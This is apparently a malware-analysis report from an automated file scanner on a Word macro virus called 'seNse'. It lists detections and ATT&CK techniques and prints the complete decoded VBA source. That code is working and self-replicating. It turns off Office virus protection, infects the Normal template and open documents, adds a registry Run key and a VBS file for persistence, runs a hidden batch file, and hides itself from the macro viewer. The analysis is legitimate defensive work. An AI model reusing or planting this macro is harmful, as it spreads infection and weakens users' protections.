MALICIOUS
396
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1059 Command and Scripting Interpreter
T1140 Deobfuscate/Decode Files or Information
T1027 Obfuscated Files or Information
The sample contains a VBA macro that attempts to disable macro protection and establish persistence by writing to the registry Run key. The script also exports itself as a DLL and attempts to create a VBS file, indicating it's designed to download and execute further malicious content. The macro explicitly attempts to disable virus protection and self-replicate, characteristic of older macro viruses.
Heuristics 9
-
ClamAV: Doc.Trojan.Verlor-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Verlor-1
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
NTReturn = Shell(windir & "\System\seNse.bat", 0) -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
windir = Environ("windir") -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5477 bytes |
SHA-256: ee74fcaf531b493446464f90ba3f42b3a96e196ce949e2422190e94764fef076 |
|||
|
Detection
ClamAV:
Doc.Trojan.Verlor-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "seNse"
Sub AutoExec()
Call Stealth
End Sub
Sub AutoClose()
On Error Resume Next
'MyName = seNse
'WrittenBy = f0re [UC/Skamerwerks/DVC]
'SpecialTanksTo = Flitnic
'Version = .C (1.1)
Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False
windir = Environ("windir")
If Dir(NormalTemplate.FullName) = "" Then GoTo EndSub
SetAttr NormalTemplate.FullName, vbNormal
If NormalTemplate.VBProject.VBComponents.Item("seNse").CodeModule.Lines(7, 1) <> "'MyName = seNse" Then
ActiveDocument.VBProject.VBComponents("seNse").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("seNse").CodeModule.Lines(7, 1) <> "'MyName = seNse" Then
NormalTemplate.VBProject.VBComponents("seNse").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
If Dir(windir & "\seNse.vbs") <> "" Then Kill (windir & "\seNse.vbs")
If Dir(windir & "\seNse.dll") <> "" Then Kill (windir & "\seNse.dll")
NormalTemplate.VBProject.VBComponents("seNse").Export (windir & "\seNse.dll")
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
Open windir & "\seNse.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "seNse" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\seNse.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1
EndSub:
End Sub
Sub Stealth()
windir = Environ("windir")
If Dir(windir & "\System\id.sys") <> "" Then Kill windir & "\System\id.sys"
If Dir(windir & "\System\seNse.bat") <> "" Then Kill windir & "\System\seNse.bat"
NormalTemplate.OpenAsDocument
NTAtt = ActiveDocument.ReadOnly
ActiveDocument.SaveAs FileName:=windir & "\System\id.sys", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
NormalTemplate.Saved = True
ActiveDocument.Saved = True
ActiveDocument.Close
Close #1
Open windir & "\System\seNse.bat" For Append As #1
Print #1, ":Begin"
For i = 1 To 500
Print #1, "rem seNse was coded by f0re [UC/Skamwerks/DVC]"
Next i
Print #1, ":Begin"
Print #1, "Move /y " & Chr(34) & "c:\windll.dat" & Chr(34) & " " & Chr(34) & NormalTemplate.FullName & Chr(34)
Print #1, "If exist c:\windll.dat goto Begin"
Close #1
FileCopy windir & "\System\id.sys", "c:\windll.dat"
NTReturn = Shell(windir & "\System\seNse.bat", 0)
End Sub
Sub ViewVBCode()
On Error Resume Next
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
NormalTemplate.Saved = True
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents("seNse")
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
For X = 1 To docnumber
Documents(X).VBProject.VBComponents("seNse").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("seNse").CodeModule.CountOfLines
Documents(X).Saved = True
Documents(X).VBProject.VBComponents.Remove Documents(X).VBProject.VBComponents("seNse")
Documents(X).Saved = True
Next X
End If
Application.ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
On Error Resume Next
For X = 1 To NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
CodeNT = CodeNT & NormalTemplate.VBProject.VBComponents("seNse").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
For X = 1 To ActiveDocument.VBProject.VBComponents("seNse").CodeModule.CountOfLines
CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("seNse").CodeModule.Lines(X, 1) & Chr(13)
Next X
For X = 1 To docnumber
Documents(X).VBProject.VBComponents("seNse").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("seNse").CodeModule.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.Dialogs(wdDialogToolsMacro).Show
If Application.ShowVisualBasicEditor = False Then
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.InsertLines 1, CodeNT
NormalTemplate.Save
If docnumber >= 1 Then
For X = 1 To docnumber
Documents(X).VBProject.VBComponents("seNse").CodeModule.InsertLines 1, CodeAD
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End If
End Sub
'Put this code in a module called "seNse". Experience stealth :) (but again not perfect stealth).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.